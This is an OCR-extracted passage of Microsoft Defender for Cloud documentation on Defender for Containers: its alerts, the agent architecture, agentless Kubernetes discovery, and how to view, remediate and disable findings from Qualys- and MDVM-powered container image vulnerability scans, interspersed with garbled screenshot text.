this information to quickly remediate security issues and improve the security of your 


containers. 


Threat protection at the cluster level is provided by the Defender agent and analysis of 
the Kubernetes audit logs. This means that security alerts are only triggered for actions 
and deployments that occur after you've enabled Defender for Containers on your 


subscription. 
Examples of security events that Microsoft Defenders for Containers monitors include: 


e Exposed Kubernetes dashboards 
e Creation of high privileged roles 


e Creation of sensitive mounts 


You can view security alerts by selecting the Security alerts tile at the top of the 
Defender for Cloud's overview page, or the link from the sidebar. 


fa] Microsoft Defender for Cloud | Overview & 


Showing 59 subscriptions 


[e Search (Ctri+/) | « KTA Subscriptions Co What's new 


General ? GR © 4 
fe) i 
E overview Azure subscriptions AWS accounts GCP projects 
@ Getting started 
z= Recommendations 
© Security alerts DO Secure score 
© Inventory Current secure score 
& Community COMPLETED 
S Controls 1/16 
Cloud Security = 
Ọ Secure Score 60% zr COMPLETED 
3626 POINTS Y= Recommendations 29/190 


D Regulatory compliance 
Ọ workload protections 


€% Firewall Manager 


Improve your secure score > 
Management 


ili Environment settings 
E security solutions DO Workload protections 
GA Workflow automation Resource coverage 


95% For full protection, enable 10 resource plans 


Alerts by severity 
20 High 
29 
10 Me.. 
| | 66 
oNPOEE EGA Tinn, b 
8 Sun 15 Sun 22 Sun 26 


Enhance your threat protection capabilities > 


The security alerts page opens. 


Home > Microsoft Defender for Cloud 


DU Microsoft Defender for Cloud | Security alerts 


bscriptions 


O Search © Refresh S v TE Open query SG Suppression rules {2 Security alerts map 


D Sample alerts 


Ọ 121 


v= 161 


Active recommendations Security alerts 


Current compliance by passed controls 


Regulatory compliance 


UKO and U... 0/7 
SOC TSP = 1/13 
NIST SP 80... Zi 2/23 
HIPAA HITR... HE 2/22 
NIST SP 80... BE 3/29 
Improve your compliance > 

>a Inventory 
Unmonitored VMs 
yg 60 To better protect your organization, 

we recommend installing agents 

Total Resources 
SS EE 
l Unhealthy (2936) | Healthy (679) 


Not applicable 285), 


A 


Explore your resources > 


EI Alerts workbook d Download CSV report GZ Guides & Feedback 


General a 
© Some subscriptions have limited protection. To enhance their protection, enable Defender plans —> 
© Overview 
st ra Open alerts by severity 
2 cages JU 832 >< 832 Sa D 1 30 pe rr 
= Recommendations Open alerts Active alerts In progress alerts Affected resources Tigh 32) Medium 282) Low (318) 


© Attack Path Analysis 
O Security alerts O Search by ID, IP, name, or affected re. 
$ Inventory 


Cloud Security Explorer Ty Add filter 


Subscript... == MayaProdTest2, Rome ILDC - ASC - Dev - Tomer... 


Resource type == Kubernetes Service, Arc Kubernetes service, .. >< 


Status == Active, In Progress >< Severity == Low, Medium, High >< 


Alert na.. == Abnormal Kubernetes service account operation... >< 


No grouping! v 


@ Workbooks 
1 E 1 ivit ime... T. © 
e Suerte I Severity A Alert name Ty Affected resource Ty Resource Group T4 Activity start time... T4 MITRE ATT&CK® tactics Status 
@ Diagnose and solve problems BN High © Exposed Kubernetes dashboard d.. @ gcp-clusters-detection-manual-te... gke-manual-tests-1-prod 06/10/23, 08:40 AM E initial Access Active d 
Cloud Security C f High @ Container with a miner image det.. @ gcp-clusters-detection-manual-te.. gke-manual-tests-1-prod 06/06/23, 10:59 AM % Execution Active 


Security alerts for runtime workload in the clusters can be recognized by the K8S.NODE_ 


prefix of the alert type. For a full list of the cluster level alerts, see the reference table of 


alerts. 


Defender for Containers also includes host-level threat detection with over 60 


Kubernetes-aware analytics, Al, and anomaly detections based on your runtime 


workload. 


Defender for Cloud monitors the attack surface of multicloud Kubernetes deployments 
based on the MITRE ATT&CK® matrix for Containers “, a framework developed by the 


Center for Threat-Informed Defense Z in close partnership with Microsoft. 


Agentless discovery for Kubernetes 


Defender for containers uses cloud security graph to collect in an agentless manner 
information about your Kubernetes clusters. This data can be queried via Cloud Security 
Explorer and used for: 


1. Kubernetes inventory: gain visibility into your Kubernetes clusters data plane 
components such as nodes, pods, and cron jobs. 


2. Security insights: predefined security situations relevant to Kubernetes 
components, such as “exposed to the internet”. For more information, see Security 
insights. 


3. Risk hunting: querying various risk cases, correlating predefined or custom security 
scenarios across fine-grained Kubernetes properties as well as Defender For 
Containers security insights. 


eea 18) Clear ai 
pa Isra x [orines ; 


Learn more 
Learn more about Defender for Containers in the following blogs: 


e Introducing Microsoft Defender for Containers E 
e Demonstrating Microsoft Defender for Cloud 7 


The release state of Defender for Containers is broken down by two dimensions: 
environment and feature. So, for example: 


e Kubernetes data plane recommendations for AKS clusters are GA 
e Kubernetes data plane recommendations for EKS clusters are preview 


To view the status of the full matrix of features and environments, see Microsoft 
Defender for Containers feature availability. 


Next steps 


In this overview, you learned about the core elements of container security in Microsoft 
Defender for Cloud. To enable the plan, see: 


e Enable Defender for Containers 
e Check out common questions about Defender for Containers. 


Defender for Containers architecture 
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Defender for Containers is designed differently for each Kubernetes environment 
whether they're running in: 


e Azure Kubernetes Service (AKS) - Microsoft's managed service for developing, 


deploying, and managing containerized applications. 


e Amazon Elastic Kubernetes Service (EKS) in a connected Amazon Web Services 
(AWS) account - Amazon's managed service for running Kubernetes on AWS 
without needing to install, operate, and maintain your own Kubernetes control 


plane or nodes. 


e Google Kubernetes Engine (GKE) in a connected Google Cloud Platform (GCP) 
project - Google’s managed environment for deploying, managing, and scaling 


applications using GCP infrastructure. 


e An unmanaged Kubernetes distribution (using Azure Arc-enabled Kubernetes) - 
Cloud Native Computing Foundation (CNCF) certified Kubernetes clusters hosted 


on-premises or on laas. 
© Note 
Defender for Containers support for Arc-enabled Kubernetes clusters (AWS EKS and 
GCP GKE) is a preview feature. 


To protect your Kubernetes containers, Defender for Containers receives and analyzes: 


e Audit logs and security events from the API server 

e Cluster configuration information from the control plane 
e Workload configuration from Azure Policy 

e Security signals and events from the node level 


To learn more about implementation details such as supported operating systems, 
feature availability, outbound proxy, see Defender for Containers feature availability. 


Architecture for each Kubernetes environment 


Azure (AKS) 


Architecture diagram of Defender for Cloud and AKS 
clusters 


When Defender for Cloud protects a cluster hosted in Azure Kubernetes Service, the 
collection of audit log data is agentless and collected automatically through Azure 
infrastructure with no additional cost or configuration considerations. These are the 
required components in order to receive the full protection offered by Microsoft 
Defender for Containers: 


e Defender agent: The DaemonSet that is deployed on each node, collects 
signals from hosts using eBPF technology “, and provides runtime protection. 
The agent is registered with a Log Analytics workspace, and used as a data 
pipeline. However, the audit log data isn't stored in the Log Analytics 
workspace. The Defender agent is deployed as an AKS Security profile. 

e Azure Policy for Kubernetes: A pod that extends the open-source 
Gatekeeperv3% and registers as a web hook to Kubernetes admission control 
making it possible to apply at-scale enforcements, and safeguards on your 
clusters in a centralized, consistent manner. The Azure Policy for Kubernetes 
pod is deployed as an AKS add-on. For more information, see Protect your 
Kubernetes workloads and Understand Azure Policy for Kubernetes clusters. 


Microsoft Defender for Containers — AKS clusters 
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Defender agent component details 


Pod 
Name 


microsoft- 
defender- 
collector- 

ds-* 


microsoft- 
defender- 
collector- 

misc-* 


Namespace 


kube- 
system 


kube- 
system 


Kind 


DaemonSet Z 


Deployment Z 


Short 
Description 


A set of 
containers 
that focus on 
collecting 
inventory 
and security 
events from 
the 
Kubernetes 
environment. 


A set of 
containers 
that focus on 
collecting 


N/A 


inventory 
and security 
events from 


Capabilities 


SYS_ADMIN, 
SYS_RESOURCE, 
SYS_PTRACE 


Resource Egress 


limits Required 


memory: No 
296Mi 


cpu: 
360m 


memory: No 
64Mi 


cpu: 60m 


Pod 
Name 


microsoft- 
defender- 
publisher- 
ds-* 


Namespace 


kube- 
system 


Kind 


DaemonSet SZ 


Short 
Description 


the 
Kubernetes 
environment 
that aren't 
bounded to 
a specific 
node. 


Publish the 
collected 
data to 
Microsoft 
Defender for 
Containers 
backend 
service 
where the 
data will be 
processed 
for and 
analyzed. 


Capabilities 


N/A 


Resource 
limits 


memory: 
200Mi 


cpu: 60m 


Egress 
Required 


Https 443 


Learn more 
about the 
outbound 
access 
prerequisites 


* Resource limits aren't configurable; Learn more about Kubernetes resources limits E 


How does agentless discovery for Kubernetes 


work? 


The discovery process is based on snapshots taken at intervals: 


Create a managed identity 


=> 


cS 


+ 


Ea 


Discover AKS clusters in 
your environment 


Enable Agentless discovery for Kubernetes 


Assign a Built-in role: 
Kubernetes Agentless Operator 


= 


When you enable the agentless discovery for Kubernetes extension, the following 


Process occurs: 


e Create: 


Kubernetes Cluster 


Trusted Access: Bind the Kubernetes 
role to the managed identity 


o If the extension is enabled from Defender CSPM, Defender for Cloud creates an 


identity in customer environments called 


CloudPosture/securityOperator/DefenderCSPMSecurityOperator . 


o If the extension is enabled from Defender for Containers, Defender for Cloud 
creates an identity in customer environments called 


CloudPosture/securityOperator/DefenderForContainersSecurityOperator . 


e Assign: Defender for Cloud assigns a built-in role called Kubernetes Agentless 
Operator to that identity on subscription scope. The role contains the following 
permissions: 

o AKS read (Microsoft.ContainerService/managedClusters/read) 

o AKS Trusted Access with the following permissions: 

o Microsoft.ContainerService/managedClusters/trustedAccessRoleBindings/write 
o Microsoft.ContainerService/managedClusters/trustedAccessRoleBindings/read 
o Microsoft.ContainerService/managedClusters/trustedAccessRoleBindings/delete 


Learn more about AKS Trusted Access. 


e Discover: Using the system assigned identity, Defender for Cloud performs a 
discovery of the AKS clusters in your environment using API calls to the API server 
of AKS. 


e Bind: Upon discovery of an AKS cluster, Defender for Cloud performs an AKS bind 
operation between the created identity and the Kubernetes role 
“Microsoft.Security/pricings/microsoft-defender-operator”. The role is visible via API 
and gives Defender for Cloud data plane read permission inside the cluster. 


Next steps 


In this overview, you learned about the architecture of container security in Microsoft 
Defender for Cloud. To enable the plan, see: 


Enable Defender for Containers 


Vulnerability assessment for Azure 
powered by Qualys 


Article e 09/06/2023 


Vulnerability assessment for Azure, powered by Qualys, is an out-of-box solution that 
empowers security teams to easily discover and remediate vulnerabilities in Linux 
container images, with zero configuration for onboarding, and without deployment of 
any agents. 


O Note 


This feature supports scanning of images in the Azure Container Registry (ACR) 
only. If you want to find vulnerabilities stored in other container registries, you can 
import the images into ACR, after which the imported images are scanned by the 
built-in vulnerability assessment solution. Learn how to import container images to 
a container registry. 


In every subscription where this capability is enabled, all images stored in ACR (existing 
and new) are automatically scanned for vulnerabilities without any extra configuration of 
users or registries. Recommendations with vulnerability reports are provided for all 
images in ACR as well as images that are currently running in AKS that were pulled from 
an ACR registry. Images are scanned shortly after being added to a registry, and 
rescanned for new vulnerabilities once every week. 


Container vulnerability assessment powered by Qualys has the following capabilities: 


e Scanning OS packages - container vulnerability assessment can scan vulnerabilities 
in packages installed by the OS package manager in Linux. See the full list of the 
supported OS and their versions. 


e Language specific packages — support for language specific packages and files, 
and their dependencies installed or copied without the OS package manager. See 
the full list of supported languages. 


e Image scanning in Azure Private Link - Azure container vulnerability assessment 
provides the ability to scan images in container registries that are accessible via 
Azure Private Links. This capability requires access to trusted services and 
authentication with the registry. Learn how to allow access by trusted services. 


e Reporting - Container Vulnerability Assessment for Azure powered by Qualys 


provides vulnerability reports using the following recommendations: 


Recommendation 


Container registry images 
should have vulnerability 
findings resolved 
(powered by Qualys) # 


Running container images 
should have vulnerability 
findings resolved 
(powered by Qualys) £ 


Description 


Container image vulnerability assessment 
scans your registry for security 
vulnerabilities and exposes detailed 
findings for each image. Resolving the 
vulnerabilities can greatly improve your 
containers’ security posture and protect 
them from attacks. 


Container image vulnerability assessment 
scans container images running on your 
Kubernetes clusters for security 
vulnerabilities and exposes detailed 
findings for each image. Resolving the 
vulnerabilities can greatly improve your 
containers’ security posture and protect 
them from attacks. 


Assessment Key 


dbd0cb49-b563- 
45e7-9724- 
889e799fa648 


41503391-efa5- 
47ee-9282- 
Aeff6131462c/ 


e Query vulnerability information via the Azure Resource Graph - Ability to query 


vulnerability information via the Azure Resource Graph. Learn how to query 


recommendations via the ARG. 


e Query vulnerability information via sub-assessment API - You can get scan results 


via REST API. See the subassessment list. 


e Support for exemptions - Learn how to create exemption rules for a management 


group, resource group, or subscription. 


e Support for disabling vulnerability findings - Learn how to disable vulnerability 


assessment findings on Container registry images. 


Scan triggers 


e One-time triggering 


o Each image pushed/imported to a container registry is scanned shortly after 


being pushed to a registry. In most cases, the scan is completed within a few 


minutes, but sometimes it may take up to an hour. 


o Each image pulled from a container registry is scanned if it wasn't scanned in 


the last seven days. 


e Continuous rescan triggering — Continuous rescan is required to ensure images 


that have been previously scanned for vulnerabilities are rescanned to update their 


vulnerability reports in case a new vulnerability is published. 


o Rescan is performed once every 7 days for: 


o images pulled in the last 30 days 


o images currently running on the Kubernetes clusters monitored by the 


Defender agent 


Prerequisites 


Before you can scan your ACR images, you must enable the Defender for Containers 


plan on your subscription. 


For a list of the types of images and container registries supported by Microsoft 
Defender for Containers, see Availability. 


View and remediate findings 


1. To view the findings, open the Recommendations page. If issues are found, you'll 


see the recommendation Container registry images should have vulnerability 


findings resolved-(powered by Qualys) Z . 


Home > Recommendations 


Container registry images should have vulnerability findings resolved» 


2. Select the recommendation. 


The recommendation details page opens with additional information. This 
information includes the list of registries with vulnerable images ("Affected 


resources") and the remediation steps. 


3. Select a specific registry to see the repositories in it that have vulnerable 


repositories. 


Home > Microsoft Defender for Cloud | Recommendations 


Container registry images should have vulnerability findings resolved 


© Exempt © Disable rule G view policy definition E Open query 


Unhealthy registries Severity Total vulnerabilities 


Au [High Q“ 


VY Description 
\ Remediation steps 
~ Affected resources 


Unhealthy registries (1) Healthy registries (0) Not applicable registries (1) 


O Search co 
[C] Name 


[C @ imagescanprivatepreview 


Vulnerabilities by severity 
High 30 pe 
Medium 116 EE 


Low o 


Unverified registries 


Ty Scanned Images 


Registries with most vulnerabilities 
ascdemo 371 


imageScanPrivatePreview 150 


CI/CD Critical Findings 


No © 


Total vulnerable images 
3 


Out of 12 scanned 


= 


The registry details page opens with the list of affected repositories. 


4. Select a specific repository to see the repositories in it that have vulnerable images. 


Home > Microsoft Defender for Cloud | Recommendations > Container registry images should have vulnerability findings resolved 


imagescanprivatepreview 
Registry security health 


Registry Vulnerable images by severity Vulnerable images by severity 
a imagescanprivatepreview 3 High — es 
Out of 3 scanned 
Medium o 
Low 0 
Unhealthy repositories (2) Healthy repositories (0) Unverified repositories 
| 2 search repositories 
Name ty Scanned Images CI/CD Critical Findings TA Vul 
@ vulnerables/web-dvwa 1 No © I TT 


The repository details page opens. It lists the vulnerable images together with an 
assessment of the severity of the findings. 


5. Select a specific image to see the vulnerabilities. 


Unhealthy images (2) Healthy images (0) Unscanned images (0) 


Ty, Scan report time 
10/28/2019, 12:57 AM GMT+2 


10/28/2019, 12:58 AM GMT+2 


The list of findings for the selected image opens. 


Home > dotnet/core/sdk > 


2e7¢9245e5fd 


Image security health 


Image Total vulnerabilities Vulnerabilities by severity 

JO 2e7¢9245e5fd 66 High 8 mE 
Medium 58 MEE 
Low 0 


“A Essentials 


Digest : sha256:2e7c9245e5fdc2 1ff0e9a5dad05 198d6639efeff7 782457 da022fc9828f13662 
Tags : [2.2.401 ,2.2.401-Sep23 ] 


os : Linux 


Findings Disabled findings 


| Ø Search to filter items... 


Severity ID Security Check Category 
@ High 178369 Debian Security Update for tzd... Debian 
@ High 177993 Debian Security Update for mer... Debian 
@ High 372268 GNU Bash Privilege Escalation... Local 

@ High 178391 Debian Security Update Multipl... Debian 
@ High 178944 Debian Security Update for libs... Debian 


@ High 178867 Debian Security Update for elfu... Debian 


A Medium 178601 Debian Security Update for sub... Debian 


6. To learn more about a finding, select the finding. 


The findings details pane opens. 


Kia 178369-Debian Security Update for tzdata (... x 
2e7c9245e5fd 
Image security health EE a 
Debian has released security update for tzdata to fix the vulnerabilities, 
Image Total vulnerabilities Vulnerabilities by severity CI/CD Scan Findings 
A General information 
JE 2e7c9245e5fd 66 High sm Image Not Scanned 
Medium m mmm D 178369 
Severity © High 
Low o 
Type Vulnerability 
A Essentials Published 1/28/2021, 2:47 PM GMT+2 
Patchable Yes 
Digest : sha256:2e7c9245e5fdc2 1ff0esa5dad05 198d6639efeff7782457da022fc9828F1 3662 
vss 3.0 base score 53 


Tags : [2.2401 2.2.401-Sep23 ] 


SS (o 

A Remediation 
Findings Disabled findings 
Eee Refer to Debian security advisory DLA 2424-1 for patching details 


[A Search to fitter items, 


Patch: 
Severity 1D Security Check Category Patch Available Package type Pack Following are links for downloading patches to fix the vulnerabilities: 
@ High 178359 Debian Security Update for tzd... Debian Yes NA N/A Gete 
© High 17993 Debian Security Update for mer... Debian Yes NA N/A 
O High 372258 GNU Bash Privilege Escalation... Local No N/A SA TO Aa 
@ High 178391 Debian Security Update Multipl.. Debian Yes N/A N/A ^ Affected resources 
@ High 178944 Debian Security Update for libs.. Debian Yes NA N/A b ZG erdia 
© High 178857 Debian Security Update for elfu.. Debian Yes NA N/A 
B fesfae9122d9 Linux dotnet/core/sdk Gete 
A Medium 178601 Debian Security Update for sub.. Debian Yes NA N/A 
B 2e7c9245e5fd Linux dotnet/core/sdk ascdemo 


This pane includes a detailed description of the issue and links to external 
resources to help mitigate the threats. 


7. Follow the steps in the remediation section of this pane. 


8. When you've taken the steps required to remediate the security issue, replace the 
image in your registry: 


a. Push the updated image to trigger a scan. 


b. Check the recommendations page for the recommendation Container registry 
images should have vulnerability findings resolved-powered by Qualys Z.. 


If the recommendation still appears and the image you've handled still appears 
in the list of vulnerable images, check the remediation steps again. 


c. When you're sure the updated image has been pushed, scanned, and is no 
longer appearing in the recommendation, delete the “old” vulnerable image 
from your registry. 


Disable specific findings 


O Note 


The Azure Preview Supplemental Terms E include additional legal terms that apply 
to Azure features that are in beta, preview, or otherwise not yet released into 
general availability. 


If you have an organizational need to ignore a finding, rather than remediate it, you can 
optionally disable it. Disabled findings don't affect your secure score or generate 


unwanted noise. 


When a finding matches the criteria you've defined in your disable rules, it doesn't 
appear in the list of findings. Typical scenarios include: 


e Disable findings with severity below medium 

e Disable findings that are nonpatchable 

e Disable findings with CVSS score below 6.5 

e Disable findings with specific text in the security check or category (for example: 
"RedHat" or "CentOS Security Update for sudo") 


@ Important 
To create a rule, you need permissions to edit a policy in Azure Policy. 


Learn more in Azure RBAC permissions in Azure Policy. 


You can use any of the following criteria: 


e Finding ID 

e CVE 

e Category 

e Security check 
e CVSS v3 scores 
e Severity 

e Patchable status 


To create a rule: 


1. From the recommendations detail page for Container registry images should have 
vulnerability findings resolved-(powered by Qualys) Z , select Disable rule. 


2. Select the relevant scope. 


Home > Microsoft Defender for Cloud | Recommendations 


Disable rule 
Container registry images should have vulnerability findings resolved (powered by Qualys} rr 


© Disable rule G View policy definition E Open query v Disable Action 


Unhealthy registries Severity Total vulnerabilities Vulnerabilities by severity Disable findings that match any of the following criteria: 
Se 2/27 EA [x] 1.5K High i Parameters 
Medium mo rr Gen 


tow o EZ 


Categories © 
~ Description f 


ty assessment scans your registry for security vulnerabilities and exposes detailed findings for each image. Resolving the vulnerabilities can greatly impre] Security checks © 


\ Remediation steps 


OEE score less than © 


v Affected resources 


Minimum severity © 
A Security Checks 


Findings Disabled findings 


None 
~] Di Non-patchable © 


Severity 1D Security Check Category 

@ High 372268 GNU rivilege Escalation Vulnerability for De... Local iez 
@ High 178670 Update for libwebp (DSA 493 Debian 

@ High 180209 Update for krb5 (CVE-2021-3 Debi 

@ High 180548 ian Security Update for qnutls28 (CVE-2021-2... Debian 


© New cisabe rules applied 
take up to 24 hours Disabling rule o 
Was this recommendation useful? O Yes © No 


Cancel 


3. Define your criteria. 
4. Select Apply rule. 


5. To view, override, or delete a rule: 
a. Select Disable rule. 


b. From the scope list, subscriptions with active rules appear as Rule applied. 


Disable rule 


41 subscriptions 


You can define a rule to disable one or more findings for this recommendation. Disabled findings won't be counted towards your 
secure score 


Item Current status More 
Vv 
v OO 
? Rule applied E Jy 
v OO View rule 
Vv IOA Delete rule 
? 


c. To view or delete the rule, select the ellipsis menu ("..."). 


View vulnerabilities for images running on your 
AKS clusters 


Defender for Cloud gives its customers the ability to prioritize the remediation of 
vulnerabilities in images that are currently being used within their environment using 
the Running container images should have vulnerability findings resolved-(powered by 
Qualys) Z recommendation. 


To provide the findings for the recommendation, Defender for Cloud collects the 
inventory of your running containers that are collected by the agentless discovery for 
Kubernetes or the Defender agent. Defender for Cloud correlates that inventory with the 
vulnerability assessment scan of images that are stored in ACR. The recommendation 
shows your running containers with the vulnerabilities associated with the images that 
are used by each container and provides vulnerability reports and remediation steps. 


While Defender agent provides pod inventory every hour, the agentless discovery for 
Kubernetes provides an update every six hours. If both extensions are enabled, the 
newest information is used. 


Home > Microsoft Defender for Cloud 


y= Microsoft Defender for Cloud | Recommendations 


Showing 14 subscriptions 


| © Refresh 


Secure score recommendations Ai recommendations 


© overview 
@ Getting started 


Z= Recommendations 


9 50% Y= 142/217 


Active recommendations 


Security alerts 


inventory Secure score © 


o 
s 
Œ. Cloud Security Explorer (Preview) 
@ Workbooks 


P running Recommendation status == None X Severity 


e Community 


@ Diagnose and solve problems © Name ty 


Cloud Security V Remediate vulnerabilities 


Security posture Machines should have a vulnerability assessment solution 


Regulatory compliance Container images should be deployed from trusted registries only 


Workload protections Running 


Firewall Manager Manage access and permissions 


@aAadgced 


DevOps Security (Preview) Remediate security configurations 


Management Restrict unauthorized network access 


I Environment settings Apply adaptive application control 


WIM ESL. 


E Security solutions Implement security best practices 


% Workflow automation 


Next steps 


Download CSV report E Open query Governance report (preview) 


EI Guides & Feedback 


Max score A 


None X 


Attack path 
With the riskiest recommendations. Open > 


Resource type == None 


Current score Ty 


241 DI 


4 ESTU 
4 131 OL 
4 102 Of 
3 291 008 
Not scored Not scored 


20 


+7 Add filter 

Potential score increase Ty Status Ty 

+4% © Overdue 
© Overdue 
© Overdue 

Completed 

+3% © Overdue 

+9% © Overdue 

+ 11% © Overdue 


+ 0% * Ontime 


© Completed 


e Learn more about the Defender for Cloud Defender plans. 


e Check out common questions about Defender for Containers. 


Y More (3) 


Unhealthy resources 
68 of 90 resources 
47 of 65 resources ( 


13 of 22 resources 


O of 5 Kubert 


28 of 318 resources 


55 of 181 resources 


211 of 377 resources 


4 of 65 resources 


170 of 4 
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@ Azure @ aws 
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Vulnerability assessments for Azure with 
Microsoft Defender Vulnerability 
Management 


Article e 09/10/2023 


Vulnerability assessment for Azure, powered by Microsoft Defender Vulnerability 
Management (MDVM), is an out-of-box solution that empowers security teams to easily 
discover and remediate vulnerabilities in Linux container images, with zero configuration 


for onboarding, and without deployment of any agents. r 


O Note 


This feature supports scanning of images in the Azure Container Registry (ACR) 
only. Images that are stored in other container registries should be imported into 
ACR for coverage. Learn how to import container images to a container registry. 


In every subscription where this capability is enabled, all images stored in ACR (existing 
and new) are automatically scanned for vulnerabilities without any extra configuration of 
users or registries. Recommendations with vulnerability reports are provided for all 
images in ACR as well as images that are currently running in AKS that were pulled from 
an ACR registry. Images are scanned shortly after being added to a registry, and 
rescanned for new vulnerabilities once every 24 hours. 


Container vulnerability assessment powered by MDVM (Microsoft Defender Vulnerability 
Management) has the following capabilities: 


e Scanning OS packages - container vulnerability assessment has the ability to scan 
vulnerabilities in packages installed by the OS package manager in Linux. See the 
full list of the supported OS and their versions. 


e Language specific packages — support for language specific packages and files, 
and their dependencies installed or copied without the OS package manager. See 
the complete list of supported languages. 


e Image scanning in Azure Private Link - Azure container vulnerability assessment 
provides the ability to scan images in container registries that are accessible via 
Azure Private Links. This capability requires access to trusted services and 
authentication with the registry. Learn how to allow access by trusted services. 


e Exploitability information - Each vulnerability report is searched through 
exploitability databases to assist our customers with determining actual risk 
associated with each reported vulnerability. 


e Reporting - Container Vulnerability Assessment for Azure powered by Microsoft 
Defender Vulnerability Management (MDVM) provides vulnerability reports using 


following recommendations: 


Recommendation Description Assessment 

Key 
Container registry images Container image vulnerability assessment cOb7cfc6- 
should have vulnerability scans your registry for commonly known 3172-465a- 
findings resolved vulnerabilities (CVEs) and provides a detailed b378- 
(powered by Microsoft vulnerability report for each image. 53c7ff2cc0d5 
Defender Vulnerability Resolving vulnerabilities can greatly improve 


Management)-Preview E your security posture, ensuring images are 
safe to use prior to deployment. 


Running container images Container image vulnerability assessment c609cfOF-71ab- 
should have vulnerability scans your registry for commonly known 41e9-a3c6- 
findings resolved vulnerabilities (CVEs) and provides a detailed 9a1f7fe1b8d5 
(powered by Microsoft vulnerability report for each image. This 

Defender Vulnerability recommendation provides visibility to 

Management) Si vulnerable images currently running in your 


Kubernetes clusters. Remediating 
vulnerabilities in container images that are 
currently running is key to improving your 
security posture, significantly reducing the 
attack surface for your containerized 
workloads. 


e Query vulnerability information via the Azure Resource Graph - Ability to query 
vulnerability information via the Azure Resource Graph. Learn how to query 
recommendations via ARG. 


e Query scan results via REST API - Learn how to query scan results via REST API. 


e Support for exemptions - Learn how to create exemption rules for a management 


group, resource group, or subscription. 


e Support for disabling vulnerabilities - Learn how to disable vulnerabilities on 


images. 


Scan triggers 


The triggers for an image scan are: 


e One-time triggering: 

o each image pushed or imported to a container registry is scanned after being 
pushed or imported to a registry. In most cases, the scan is completed within a 
few minutes, but sometimes it may take up to an hour. 

o [Preview] each image pulled from a registry is triggered to be scanned within 24 


hours. 


O Note 


While Container vulnerability assessment powered by MDVM is generally 
available for Defender CSPM, scan-on-push and scan-on-pull is currently in 


public preview. 


e Continuous rescan triggering — Continuous rescan is required to ensure images 
that have been previously scanned for vulnerabilities are rescanned to update their 
vulnerability reports in case a new vulnerability is published. 

o Re-scan is performed once a day for: 
o images pushed in the last 90 days. 
o [Preview] images pulled in the last 30 days. 
o images currently running on the Kubernetes clusters monitored by Defender 
for Cloud (either via agentless discovery and visibility for Kubernetes or the 


Defender agent). 


O Note 


While Container vulnerability assessment powered by MDVM is generally 
available for Defender CSPM, scanning images pulled in the last 30 days is 


currently in public preview 


How does image scanning work? 


A detailed description of the scan process is described as follows: 


e When you enable the container vulnerability assessment for Azure powered by 
MDVM, you authorize Defender for Cloud to scan container images in your Azure 


Container registries. 


e Defender for Cloud automatically discovers all containers registries, repositories 
and images (created before or after enabling this capability). 


e Defender for Cloud receives notifications whenever a new image is pushed to an 
Azure Container Registry. The new image is then immediately added to the catalog 
of images Defender for Cloud maintains, and queues an action to scan the image 


immediately. 


e Once a day, or when an image is pushed to a registry: 

o All newly discovered images are pulled, and an inventory is created for each 
image. Image inventory is kept to avoid further image pulls, unless required by 
new scanner capabilities. 

o Using the inventory, vulnerability reports are generated for new images, and 
updated for images previously scanned which were either pushed in the last 90 
days to a registry, or are currently running. To determine if an image is currently 
running, Defender for Cloud uses both agentless discovery and visibility within 
Kubernetes components and inventory collected via the Defender agent 
running on AKS nodes 

o Vulnerability reports for container images are provided as a recommendation Z. 


e For customers using either agentless discovery and visibility within Kubernetes 
components or inventory collected via the Defender agent running on AKS nodes, 
Defender for Cloud also creates a recommendation £ for remediating 


vulnerabilities for vulnerable images running on an AKS cluster. 


O Note 


For Defender for Container Registries (deprecated), images are scanned once on 
push, on pull, and rescanned only once a week. 


If | remove an image from my registry, how 
long before vulnerabilities reports on that 
image would be removed? 


Azure Container Registries notifies Defender for Cloud when images are deleted, and 
removes the vulnerability assessment for deleted images within one hour. In some rare 
cases, Defender for Cloud may not be notified on the deletion, and deletion of 
associated vulnerabilities in such cases may take up to three days. 


Next steps 


e Learn more about the Defender for Cloud Defender plans. 
e Check out common questions about Defender for Containers. 


Enable vulnerability assessment in Azure 
powered by MDVM 


Article e 09/04/2023 


Vulnerability assessment for Azure, powered by Microsoft Defender Vulnerability 
Management (MDVM), is an out-of-box solution that empowers security teams to easily 
discover and remediate vulnerabilities in Linux container images, with zero configuration 


for onboarding, and without deployment of any agents. 


How to enable vulnerability assessment in 
Azure powered by MDVM 


1. Before starting, verify that the subscription is onboarded to Defender CSPM, 
Defender for Containers or Defender for Container Registries. 


2. In the Azure portal, navigate to the Defender for Cloud's Environment Settings 
page. 


3. Select the subscription that's onboarded to one of the above plans. Then select 


Settings. 


4. Ensure the Container registries vulnerability assessments extension is toggled to 
On. 


5. Select Continue. 


Home > Microsoft Defender for Cloud | Environment settings > Settings | Defender plans 


Settings & monitoring 


When you enable an extension, it will be installed on any new or existing resource, by assigning a security policy. 
Defenders plans : Defender CSPM 
‘Component Description Defender plans Configuration Status 


Agentless scanning for machines ines for installed software and vulnerabilities without relying on agents or impacting BS = On © 
m more 


Agentless discovery for Kubernetes (preview) API-based dis ibernetes cluster architecture, workload objects, and setup. E 
Required rk 


work exposure detection, attack path analysis and 


6. Select Save. 


A notification message pops up in the top right corner that will verify that the settings 
were saved successfully. 


How to enable runtime coverage 


e For Defender CSPM, use agentless discovery for Kubernetes. For more information, 
see Onboard agentless container posture in Defender CSPM. 

e For Defender for Containers, use agentless discovery for Kubernetes or use the 
Defender agent. For more information, see Enable the plan. 

e For Defender for Container Registries, there is no runtime coverage. 


Next steps 


e Learn more about Trusted Access. 

e Learn how to view and remediate vulnerability assessment findings for registry 
images and running images. 

e Learn how to create an exemption for a resource or subscription. 

e Learn more about Cloud Security Posture Management. 


View and remediate vulnerabilities for 
registry images 


Article e 07/31/2023 


Defender for Cloud gives its customers the ability to remediate vulnerabilities in 
container images while still stored in the registry by using the Container registry images 
should have vulnerability findings resolved (powered by MDVM) Z recommendation. 


Within the recommendation, resources are grouped into tabs: 


e Healthy resources — relevant resources, which either aren't impacted or on which 
you've already remediated the issue. 

e Unhealthy resources — resources that are still impacted by the identified issue. 

e Not applicable resources — resources for which the recommendation can't give a 
definitive answer. The not applicable tab also includes reasons for each resource. 


If you are using Defender CSPM, first review and remediate vulnerabilities exposed via 
attack paths, as they pose the greatest risk to your security posture. Then view 
remediate vulnerabilities for running images, and finally use the following procedures 
described here to view, remediate, prioritize, and monitor vulnerabilities in your registry 
images. 


View vulnerabilities on a specific container 
registry 


1. Open the Recommendations page, using the > arrow to open the sublevels. If 
issues were found, you'll see the recommendation Container registry images 
should have vulnerability findings resolved (powered by MDVM) £Z. Select the 


recommendation. 


